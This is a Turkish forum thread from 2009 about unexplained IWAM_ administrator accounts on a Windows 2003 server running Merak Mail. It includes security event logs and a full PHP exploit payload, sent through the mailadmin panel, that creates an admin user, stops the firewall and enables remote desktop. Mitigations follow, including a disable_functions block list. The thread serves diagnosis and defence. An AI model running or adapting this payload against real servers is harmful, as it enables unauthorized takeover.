iwam user açılması firewall otomatik kapanması

Merhaba,

Serverinizin isletim sistemi vrsiyonu nedir ?

Hangi uygulamalari ve programlari calistiriyor ( IIS, vs )

- IWAM USER IIS kurulumunda gelen bir kullanicidir

- Defaultda administrator grubuna ekli degildit

- Server sisteminizde ( Windows ise ) Firewall hizmeti defaultda kapali gelir zaten

Scripte gelince benim tahminim bu sunucuya ulasan bir baskasi bu kullaniciyi admin grubuna eklemis olabilir, en cok kullanilan  guncel script lerin tum listesini Microsoft - Hey script guy arşivini indirerek ulaşabilirsiniz

serkan bey merhaba;

2003 std. framework 2.0 var iss 5.0 var  merak mail çalışıyor. windows firewal hizmeti  sorumu o zaman şöyle sorayım ?

iwam user2345, iwam user2342  randım  nasıl sistemde olmadan açılır ve nasıl admin grubuna dahil edilir mutlaka bunu uzaktan açan bir vbs vb. bişey var ?

 kolay gelsin.

konu hakkında yorumlarınızı bekliyorum.

iyi çalışmalar.

Merhabalar,

Simdi durum degisti, hesaplarin acildigi makinede ( eger domaine bagli ise domain policy uzerinden degilse local policy )

computer configuration - wind. - sec. - loc - audit policy nin icindeki "Audit account management" a cift tiklayip success ve failure lari isaretleyin, daha snra sonuclari gormek yani hesap acma islemlerini takip etmek icin eventvwr.msc den - security tabinin altindaki loglara bakin, eger bu tam olarak isimi gormez derseniz 3ncu parti mcafee kurumsal urunlerini kullanmanizi oneririm.

sorumu daha iyi anlatmak için  ekran görüntüsünü gönderiyorum

[URL= http://img178.imageshack.us/img178/8440/85469218.th.jp g" target="_blank">http://img178.imageshack.us/img178/8440/85469218.th.jp g"/> [/IMG][/URL] 

Merhaba,

size önerdiğim gibi audit yapmanızı öneririm, audit account management success i secerseniz işinizi görecektir, auditle nasıl çalışacağınızın örneğini paylaşım ve güvenlik isimli makalede bulabilirsiniz, umarım yardımcı olur.

serkan bey teşekkürler.

incelemeden sonra bilgi vereceğim

iyi çalışmalar.

serkan bey merhaba;

 inceleme yaptım ve logda iwam user açma olayını yakaladım.  aşağıda bildiriyorum bu olayı nasıl durdurabilirim. ? serveradı yazan yerler makine adı ben bu forumda yazmak istemediğim için serveradı dedim.

23.03.2009    06:02:58    Security    Başarı Denetimi    Hesap Yönetimi     636    NT AUTHORITY\SYSTEM    SERVERADI    "Güvenliği Etkinleştirilmiş Yerel Grup Üyesi Eklendi:
     Üye Adı:    -
     Üye Kimliği:    SERVERADI \IWAM_62992
     Hedef Hesap Adı:    Users
     Hedef Etki Alanı:    Builtin
     Hedef Hesap Kimliği:    BUILTIN\Users
     Arayan Kullanıcı Adı:    SERVERADI $
     Arayan Etki Alanı:    ONEISP
     Arayan Oturum Açma Kimliği:    (0x0,0x3E7)
     Ayrıcalıklar:    -
 

serkan bey öneriniz nedir ?

iyi çalışmalar.

23.03.2009 06:02:58 Security Başarı Denetimi Hesap Yönetimi  636 NT AUTHORITY\SYSTEM SERVERADI "Güvenliği Etkinleştirilmiş Yerel Grup Üyesi Eklendi:
  Üye Adı: -
  Üye Kimliği: SERVERADI\IWAM_62992
  Hedef Hesap Adı: Administrators
  Hedef Etki Alanı: Builtin
  Hedef Hesap Kimliği: BUILTIN\Administrators
  Arayan Kullanıcı Adı: SERVERADI$
  Arayan Etki Alanı: ONEISP
  Arayan Oturum Açma Kimliği: (0x0,0x3E7)
  Ayrıcalıklar: -
"
23.03.2009 06:02:58 Security Başarı Denetimi Hesap Yönetimi  636 NT AUTHORITY\SYSTEM SERVERADI "Güvenliği Etkinleştirilmiş Yerel Grup Üyesi Eklendi:
  Üye Adı: -
  Üye Kimliği: SERVERADI\IWAM_62992
  Hedef Hesap Adı: Users
  Hedef Etki Alanı: Builtin
  Hedef Hesap Kimliği: BUILTIN\Users
  Arayan Kullanıcı Adı: SERVERADI$
  Arayan Etki Alanı: ONEISP
  Arayan Oturum Açma Kimliği: (0x0,0x3E7)
  Ayrıcalıklar: -
"
23.03.2009 06:02:58 Security Başarı Denetimi Hesap Yönetimi  628 NT AUTHORITY\SYSTEM SERVERADI "Kullanıcı Hesabı parola ataması:
  Hedef Hesap Adı: IWAM_62992
  Hedef Etki Alanı: SERVERADI
  Hedef Hesap Kimliği: SERVERADI\IWAM_62992
  Arayan Kullanıcı Adı: SERVERADI$
  Arayan Etki Alanı: ONEISP
  Arayan Oturum Açma Kimliği: (0x0,0x3E7)
"
23.03.2009 06:02:58 Security Başarı Denetimi Hesap Yönetimi  642 NT AUTHORITY\SYSTEM SERVERADI "Kullanıcı Hesabı Değiştirildi:
  Hedef Hesap Adı: IWAM_62992
  Hedef Etki Alanı: SERVERADI
  Hedef Hesap Kimliği: SERVERADI\IWAM_62992
  Arayan Kullanıcı Adı: SERVERADI$
  Arayan Etki Alanı: ONEISP
  Arayan Oturum Açma Kimliği: (0x0,0x3E7)
  Ayrıcalıklar: -
 Değişen Öznitelikler:
  SAM Hesabı Adı: IWAM_62992
  Görünen Ad: <değer ayarlanmadı>
  Kullanıcı Asıl Adı: -
  Giriş Dizini: <değer ayarlanmadı>
  Giriş Sürücüsü: <değer ayarlanmadı>
  Komut Dosyası Yolu: <değer ayarlanmadı>
  Profil Yolu: <değer ayarlanmadı>
  Kullanıcı İş İstasyonları: <değer ayarlanmadı>
  Parola Son Ayarlama: 23.03.2009 06:02:58
  Hesap Süresi Sonu: <hiçbir zaman>
  Birincil Grup Kimliği: 513
  İzin Verilen Temsilci: -
  Eski UAC Değeri: 0x4AA34C8
  Yeni UAC Değeri: 0x4AA34C8
  Kullanıcı Hesabı Denetimi: -
  Kullanıcı Parametreleri: -
  SID Geçmişi: -
  Oturum Açma Saatleri: <değer değiştirildi, ancak görüntülenmedi>
"
23.03.2009 06:02:58 Security Başarı Denetimi Hesap Yönetimi  626 NT AUTHORITY\SYSTEM SERVERADI "Kullanıcı Hesabı Etkinleştirildi:
  Hedef Hesap Adı: IWAM_62992
  Hedef Etki Alanı: SERVERADI
  Hedef Hesap Kimliği: SERVERADI\IWAM_62992
  Arayan Kullanıcı Adı: SERVERADI$
  Arayan Etki Alanı: ONEISP
  Arayan Oturum Açma Kimliği: (0x0,0x3E7)
"
23.03.2009 06:02:58 Security Başarı Denetimi Hesap Yönetimi  624 NT AUTHORITY\SYSTEM SERVERADI "Kullanıcı Hesabı Oluşturuldu:
  Yeni Hesap Adı: IWAM_62992
  Yeni Etki Alanı: SERVERADI
  Yeni Hesap Kimliği: SERVERADI\IWAM_62992
  Arayan Kullanıcı Adı: SERVERADI$
  Arayan Etki Alanı: ONEISP
  Arayan Oturum Açma Kimliği: (0x0,0x3E7)
  Ayrıcalıklar:  -
 Öznitelikler:
  SAM Hesabı Adı: IWAM_62992
  Görünen Ad: <değer ayarlanmadı>
  Kullanıcı Asıl Adı: -
  Giriş Dizini: <değer ayarlanmadı>
  Giriş Sürücüsü: <değer ayarlanmadı>
  Komut Dosyası Yolu: <değer ayarlanmadı>
  Profil Yolu: <değer ayarlanmadı>
  Kullanıcı İş İstasyonları: <değer ayarlanmadı>
  Parola Son Ayarlama: <hiçbir zaman>
  Hesap Süresi Sonu: <hiçbir zaman>
  Birincil Grup Kimliği: 513
  İzin Verilen Temsilci: -
  Eski UAC Değeri: 0x4AA34C8
  Yeni UAC Değeri: 0x4AA34C8
  Kullanıcı Hesabı Denetimi: -
  Kullanıcı Parametreleri: <değer ayarlanmadı>
  SID Geçmişi: -
  Oturum Açma Saatleri: <değer değiştirildi, ancak görüntülenmedi>
"
23.03.2009 06:02:58 Security Başarı Denetimi Hesap Yönetimi  632 NT AUTHORITY\SYSTEM SERVERADI "Güvenliği Etkinleştirilmiş Genel Grup Üyesi Eklendi:
  Üye Adı: -
  Üye Kimliği: SERVERADI\IWAM_62992
  Hedef Hesap Adı: None
  Hedef Etki Alanı: SERVERADI
  Hedef Hesap Kimliği: SERVERADI\None
  Arayan Kullanıcı Adı: SERVERADI$
  Arayan Etki Alanı: ONEISP
  Arayan Oturum Açma Kimliği: (0x0,0x3E7)
  Ayrıcalıklar: -
"

merhaba;

serkan bey dışında başka bir hocadan da yanıt almak isterim.

iyi çalışmalar.

Merhaba ;

plesk , helm , cpanel gibi hosting yönetimi yapan yazılımlar bu kullanıcıları otomatik olarak sisteme tanımlarlar.

hakan bey merhaba;

plesk , helm , cpanel   bu tarz bir uygulama yok ayrıca loglarda size ilettiğim yaratma işlemi direkt  benim bilgim dışında oluyor dikkatli bakarsanız

Hedef Hesap Adı: IWAM_62992
  Hedef Etki Alanı: SERVERADI
  Hedef Hesap Kimliği: SERVERADI\IWAM_62992
  Arayan Kullanıcı Adı: SERVERADI$
  Arayan Etki Alanı: ONEISP
  Arayan Oturum Açma Kimliği: (0x0,0x3E7)

Değişen Öznitelikler:
  SAM Hesabı Adı: IWAM_62992
  Görünen Ad: <değer ayarlanmadı>
  Kullanıcı Asıl Adı: -
  Giriş Dizini: <değer ayarlanmadı>
  Giriş Sürücüsü: <değer ayarlanmadı>
  Komut Dosyası Yolu: <değer ayarlanmadı>
  Profil Yolu: <değer ayarlanmadı>
  Kullanıcı İş İstasyonları: <değer ayarlanmadı>
  Parola Son Ayarlama: 23.03.2009 06:02:58
  Hesap Süresi Sonu: <hiçbir zaman>
  Birincil Grup Kimliği: 513
  İzin Verilen Temsilci: -
  Eski UAC Değeri: 0x4AA34C8
  Yeni UAC Değeri: 0x4AA34C8
  Kullanıcı Hesabı Denetimi: -
  Kullanıcı Parametreleri: -
  SID Geçmişi: -

   yaratan   random bir kod oluşturuyor.    arayan kullanıcı adı: serveradi$  olarak görünüyor bu durumda hangi  userları veya grupları kontrol etmem gerekir. netden araştırdım bole bir sorun yaşan bulamadım yada ben bulamadım 🙁

yani kod windows sistemini çatır çatır  kullanıyor nasıl bir önlem almam gerekir ?

ilginize teşekkürker.

merhaba;

 konu ile bir çok arkadaş telefon ile bana ulaştı bende burada konu hakkında bilgi vermek istiyorum

 merak mail 8.0.3 ver  kullanan 2003 sunucularında böyle bir sıkıntı olmaktadır  cozumleri aşağı tarafınıza iletiyorum.

NEDENİ;

mailadmin panelinden  veya mail olarak aşağıdaki code bloğu gönderilir

------------------------------6a52fd0313af
Content-Disposition: form-data; name="data"
ob_start();
phpinfo();
$phpinfo = array('phpinfo' => array());
if(preg_match_all('#(?:<h2>(?:<a name=".*?">)?(.*?)(?:</a>)?</h2>)|(?:<tr(?: class=".*?")?><t[hd](?: class=".*?")?>(.*?)\s*</t[hd]>(?:<t[hd](?: class=".*?")?>(.*?)\s*</t[hd]>(?:<t[hd](?: class=".*?")?>(.*?)\s*</t[hd]>)?)?</tr>)#s', ob_get_clean(), $matches, PREG_SET_ORDER))
   foreach($matches as $match)
       if(strlen($match[1]))
           $phpinfo[$match[1]] = array();
       elseif(isset($match[3]))
           $phpinfo[end(array_keys($phpinfo))][$match[2]] = isset($match[4]) ? array($match[3], $match[4]) : $match[3];
       else
           $phpinfo[end(array_keys($phpinfo))][] = $match[2];
echo "VULNERABLE\n";
echo "SYSTEM: ".$phpinfo['phpinfo']['System']."\n";
if($_ENV['OS'] == "Windows_NT") {
$login ="IWAM_".rand (10000, 99999);
$password = "-".rand (10000, 99999)."@";
echo "LOGIN: $login\n";
echo "PASSWORD: $password\n";
@system("net user $login $password /ADD /EXPIRES:NEVER /ACTIVE:YES");
@system("net localgroup administrators $login /add");
@system("net localgroup administrateurs $login /add");
@system("net localgroup administratorens $login /add");
@system("net stop sharedaccess");
@system("net start dcomlaunch");
@system("net start termservice");
taille("c:");
taille("d:");
taille("e:");
taille("f:");
taille("g:");
taille("h:");
taille("i:");
taille("j:");
taille("k:");
taille("l:");
taille("m:");
taille("n:"); 
taille("o:");
taille("p:");
taille("q:");
taille("r:");
taille("s:");
taille("t:");
taille("u:");
taille("v:");
taille("w:");
taille("x:");
taille("y:");
taille("z:");
} else {
taille("/");
}
function download($file,$link) {
@unlink($file);
$get = @file_get_contents($link);
$fhack = @fopen ($file, "a");
@fwrite ($fhack, $get);
@fclose ($fhack);
}
function taille($disk) {
// Entrez la partition
$dt = disk_total_space($disk);
// Réentrez la partition
$df = disk_free_space($disk);
if(!$dt) { return; }
$used = $dt - $df;
echo "$disk Total: ".getSize($dt)." Free: ".getSize($df)." Used: ".getSize($used)."\n";
}
function getSize($taille, $units = "yes") {
$dimSize = array("octets", "Ko", "Mo", "Go", "To");
$i = 0;
while ($taille >= 1024) {
 $taille /= 1024;
 $i++;
}
return ($units == "yes") ? round($taille, 2) . " " . $dimSize[$i] : round($taille, 2);
}
------------------------------6a52fd0313af--

------------------------------------------------------------------------------------------------------------------------

 koda bakarsanız yapılan işlemde random userları açılıyor ve admin gruba ekleniyor bundan sonra yapılcak işlemleri anlatmama sanırım gerek yok.

ÇÖZÜM:

öncelikle sistem sahibi bunun phpden kaynaklı olmasından dolayı php.ini üzerinde disable_functions  parametrelerin neler olduguna bakmasi lazım

disable_functions  eger boş ise  aşağıdaki parmetereler girmesini öneririm tabi bu parametreleri girdikten sonra 2003 üzerinde içerik yönetim sistemli sayfaları var ise fonsiyonların kapatılmasından dolayı çalışma sorunu olabilir. fonsiyonları inceleme yaparak eklemenizi tavsiye ederim.

------------------------------------------------------------------------------------------------------
disable_functions = foreach, glob, openbasedir, posix_getpwuid, f_open, system,dl, array_compare, array_user_key_compare, passthru, cat, exec, popen, proc_close, proc_get_status, proc_nice, proc_open, escapeshellcmd, escapeshellarg, show_source, posix_mkfifo, ini_restore, mysql_list_dbs, get_current_user, getmyuid,pconnect, link, symlink, fin, passthruexec, fileread, shell_exec, pcntl_exec, ini_alter, parse_ini_file, leak, apache_child_terminate, chown, posix_kill, posix_setpgid, posix_setsid, posix_setuid, proc_terminate, syslog, allow_url_fopen, fpassthru, execute, shell, curl_exec, chgrp, stream_select, passthru, socket_select, socket_create, socket_create_listen, socket_create_pair, socket_listen, socket_accept, socket_bind, socket_strerror, pcntl_fork, pcntl_signal, pcntl_waitpid, pcntl_wexitstatus, pcntl_wifexited, pcntl_wifsignaled, pcntl_wifstopped, pcntl_wstopsig, pcntl_wtermsig, openlog, apache_get_modules, apache_get_version, apache_getenv, apache_note, apache_setenv, virtual
-----------------------------------------------------------------------------------------------

tabi bu işlem bizim bu sorunu çözmüyor çünkü merak için kullanılan ini dosyası bu değil
bizim ayarlama yapacağımız dosya windows içinde  wmi.ini dosyası merak mail bu ini dosyası kullanıyor

dosya açıldıktan sonra sizde bakarak anlayabilirsiniz disable_func parametesi tanımı olmadığını ve aşağıdaki tanımlamaları yapmanıızı gerekmektedir.

--------------------------------------------------------------------------------------------
disable_functions = foreach, glob, openbasedir, posix_getpwuid, f_open, system,dl, array_compare, array_user_key_compare, passthru, cat, exec, popen, proc_close, proc_get_status, proc_nice, proc_open, escapeshellcmd, escapeshellarg, show_source, posix_mkfifo, ini_restore, mysql_list_dbs, get_current_user, getmyuid,pconnect, link, symlink, fin, passthruexec, fileread, shell_exec, pcntl_exec, ini_alter, parse_ini_file, leak, apache_child_terminate, chown, posix_kill, posix_setpgid, posix_setsid, posix_setuid, proc_terminate, syslog, allow_url_fopen, fpassthru, execute, shell, curl_exec, chgrp, stream_select, passthru, socket_select, socket_create, socket_create_listen, socket_create_pair, socket_listen, socket_accept, socket_bind, socket_strerror, pcntl_fork, pcntl_signal, pcntl_waitpid, pcntl_wexitstatus, pcntl_wifexited, pcntl_wifsignaled, pcntl_wifstopped, pcntl_wstopsig, pcntl_wtermsig, openlog, apache_get_modules, apache_get_version, apache_getenv, apache_note, apache_setenv, virtual
-------------------------------------------------

bu işlemi yaptıktan sonra yapılması gereken 2 işlem daha var

1. olarak admin grup adını değiştimeniz ve bu adını makine adı veya benzeri olması örnek olarak atıyorum: s35 gibi mesala böylece yukarıdaki kod bloğunda admine alma işlemi kod çalışsa bile yapılamayacaktır.

2. olarak C:\Program Files\Merak\html\admin\inc accounts.php dosyasını kullanılmaması için uzantı değişikliği yapılması gerekir. bunu sakıncası kullanıcılar mailadmin kullanımını bundan sonra yapamayacaktır.  tercih size kalmış.

bundan sonra issreset yapmanız veya sistemi tekrar baştan reset atmanız gerekir tercih size kalmış.

ancak şu var bu işlemleri yapmak tamam bu işten kurtuldum anlamına gelmesin benim her zaman söylediğim bir söz var yazılım ben veya benim tanıdığım biri tarafından yazılmamış her yazılım  bu isterse dünyanın en büyük firması olsun her zaman güvenlik "0" anlamına gelir. yani sonuç olarak bu işlemleri yaptıktan sonra siz admin gruba veya sisteminizi ara ara kontrol etmenizi isterim.

iyi çalışmalar.